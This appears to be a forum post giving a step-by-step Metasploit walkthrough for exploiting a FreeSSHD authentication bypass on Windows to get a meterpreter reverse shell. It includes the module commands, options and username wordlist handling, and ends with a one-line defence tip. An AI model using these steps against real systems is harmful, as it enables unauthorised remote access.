So I found and interesting exploit in metasploit today mainly out of boredom and I figured I would share here. Below you will find a step my step of how to use metasploit to exploit FreeSSHD on windows to get a meterpreter shell.
start: FreeSSHD on your windows Victim box and check for any custom ports.
start: mfsconsole in kali
run: use exploit/windows/ssh/freesshd_authbypass
run: show options
run: set RHOST [victim ip]
run: set RPORT [victim port running ssh]
run: set LHOST [host ip]
run: set LPORT [local listening port]
Note: This exploit uses a user name list for the attack if the user that the ssh service uses to authenticate is not in this list this exploit won’t work. However there is an option you can set if you know the username or wish to guess at it.
ex: set USERNAME crazy_user123456789
Note: Also you can always find larger user name lists and add them to the list that metasploit uses located at “/opt/metasploit/apps/pro/msf3/data/wordlists/unix_users.txt” or you can change this path to point at your own list using the
ex: set USER_FILE /youpath/users.txt
Note: Kali of course has built in wordlist which you can find at the following location
Note: Once the exploit works you have a meterpreter shell
Solution if you are trying to protect against this attack, use a complicated username or use cygwin sshd for windows operating systems instead.